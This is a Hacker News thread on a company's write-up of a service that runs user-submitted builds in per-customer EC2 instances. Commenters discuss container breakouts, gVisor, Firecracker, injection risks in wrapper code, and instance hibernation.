Hacker News new | past | comments | ask | show | jobs | submit login

Thanks for sharing this. One of the authors here.

We built a service that executes arbitrary user-submitted code. An RCE service. It's the thing you're not supposed to build, but we had to do it.

Running arbitrary code means containers weren't a good fit ( container breakouts happen), so we are spinning up and down ec2 instances. This means we have actual infrastructure as code (i.e. not just piles of terraform but go code running in a service that spins up and down VMs based on API calls).

The service spins up and down EC2 instances based on user requests and executes user-submitted build scripts inside them.

It's not the standard web service we were used to building, so we thought we'd write it up and share it with anyone interested.

One cool thing we learned was how quickly you can Hibernate and wake up x86 EC2 instances. That ended up being a game-changer for us.

Corey and Brandon did the building, I'm mainly just the person who wrote things down, but hopefully, people find this interesting.




Container break outs are rare and they typically require the attacker being able to control either the container creation parameters and/or the actual image being run. If you control those things and apply process isolation best practices (seccomp, cap drops, etc) then you are in pretty good shape.

Source: ran a container based RCE service that ran millions of arbitrary workloads per month. We had sophisticated network and system anomaly detection, high priced pentesters etc and never had a breakout.


> ... never had a breakout.

Would "never detected a breakout" be better wording? :)


> We had sophisticated network and system anomaly detection, high priced pentesters

I assume GP wrote that in order to say that they have a high confidence that they never actually had a breakout.

You are technically correct. But your logic applies to everything. Is the isolation provided by VMs good enough? Is airgapping enough to prevent breakout?

There are many things that factor in when you decide what's reasonable. Some are first principle arguments (containers use the same kernel as the host, the kernel has a large surface area, ...). Others are statistical arguments: there have been past breakouts with this stack, it's thus reasonable to expect more in the future, ...


Interesting! What was the service? IN our case we control the container, which is BuildkitD, but it has to be run privileged, which means lots of solutions are off the table.


Rather not say. Yea building and then running containers where users get to pick the base image is a risk.

We found that privileged is a pretty big hammer and thought we needed it too but we found ways to give us the functionality we needed without all the extra stuff we didn't need the privileged brings in.


Have you used things like gvisor?


I would suggest also looking at https://github.com/bazelbuild/remote-apis. Its essentially a standard API for remote (any binary) execution as a service and there are several reference implementations of it (Buildgrid, BuildBarn, Google's own service etc).

And you can consider using gVisor to minimize container breakouts to a great extent.


I'll checkout that remote-apis link.

gVisor was considered but so far it looks like the next iteration with be using firecracker vms. Our backend is buildkit and it can't run in gvisor containers without some work.


Firecracker looks great but it requires bare metal instances or nested virtualization (which is not supported by EC2 instances IIRC).

How do you run firecracker?


EC2 metal instances are expensive but they let you run FC.


> One cool thing we learned was how quickly you can Hibernate and wake up x86 EC2 instances. That ended up being a game-changer for us.

Could you talk more about it? Are you keeping a cache of hibernated EC2 instances and re-launching them per request? What sort of relaunch latency profile do you see as function of instance memory size?


A specific Ec2 instance is always serving one customer max. And builds are highly cachable, so the ec2 instance has an EBS volume on it with a big cache that Earthly uses to prevent rework.

That instance is just sitting around waiting for gRPC requests that tell it to run another build. If it's idle for 30 minutes, it hibernates and then if another call comes back in a gRPC proxy wakes it back up.

I don't know if the wake up time increases per the size of the cache in memory, I can check with Brandon but its much faster starting up an instance cold, mainly because buildkit is designed for throughput and not a quick startup.

There are more details in the blog.


how do you prevent build 1 from modifying the VM in a way that impacts build 2?

if a build 1 happens to install a specific libc, do you un-install that libc before running build 2?

if you just say that stuff is the responsibility of the user, okay, but then the artifacts produced by this system aren't deterministic, which seems like a problem?


Good question, so the builds are specified in Earthfiles, which are run by our buildkit backend.

Buildkit runs the builds in runC, so basically containers are used to keep things deterministic, but the buildkit backend isn't shared, each is in own EC2 instance.


if your security model assumes user code is able to break out of containers, then it also has to assume user code will be able to modify the VM

if user code can modify the VM, and VMs are stateful, then how do you ensure hermetic builds?


So the builds are specified in Earthfiles, which are run by our buildkit backend.

Buildkit runs the builds in runC, so basically containers are used to keep things deterministic, but the buildkit backend isn't shared, each is in own EC2 instance.

So if you could break out or access cache entries that weren't correct you would have found a way to break reproducibility, but not access anything you shouldn't.


ah, okay, so you're using containers, you're running those containers on VMs that are per-customer rather than shared/multi-tenant, and the post is about optimizing how those VMs are managed -- got it

> but the buildkit backend isn't shared, each is in own EC2 instance

it isn't shared between different customers, but it is shared between different builds for the same customer, right?


While container breakouts do happen, they're pretty rare. I'd be more concerned about any potential injection vectors in the go code, which could lead to a cloud breach if you're not careful ;)


There have been a bunch of Linux kernel privesc vulns that can be converted to container breakouts from standard Linux containers, just look at bounties from Google's kCTF (AFAIK they've had 10 different kernel vulns in 2 years)

It's possible to mitigate/reduce them for sure, with appropriate hardening, but the Linux kernel is still quite a big attack surface.


What about kernels like seL4? I think everyone will abandon monolithic kernels one day because they have too much attack surface.


Is anyone running normal workloads (node/java/php/python/whatever) on seL4 without sticking Linux in the middle?


Oh interesting. What were you imagining as the injection vector?

The earthly backend runs on a modified buildkit so it is running the arbitrary code in a container, but it's also in its own VM. This was simpler then firecracker to get started but turned out to have pretty good performance and alright cost once we started suspending things.


More if you're running `provision --vm-name "$UserSuppliedData"` or similar. I don't know how you've built your wrapping tool, so I can't comment on how likely it would be, but I've seen such breakages IRL (I break things for a living ;) )


Good point, we do have things locked down pretty well in our go code though. The instances can only be provisioned using an API, and that API doesn't allow for arbitrary user-supplied input.


I had the impression that's what fly.io was doing.

Converting Docker images to run in VMs instead of containers.


Fly uses Firecracker like AWS Lambda, not full-fledged VMs like EC2.


That’s not accurate. Fly creates a FC VM from a Dockerfile but injects a pid1 supervisor and behaves more like EC2 than Lambda (no 15 mins execution limit for instance).


Did you consider using firecracker?


Yeah, we totally did and actually Corey has been playing around with a POC for backing with firecracker. It's likely the next revision of this will use firecracker.

So it wasn't so much disqualified as decided it wouldn't be the v1 solution. We wanted to get something out and get people on it and get feedback. So weren't afraid to spend some more computer dollars to do so.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: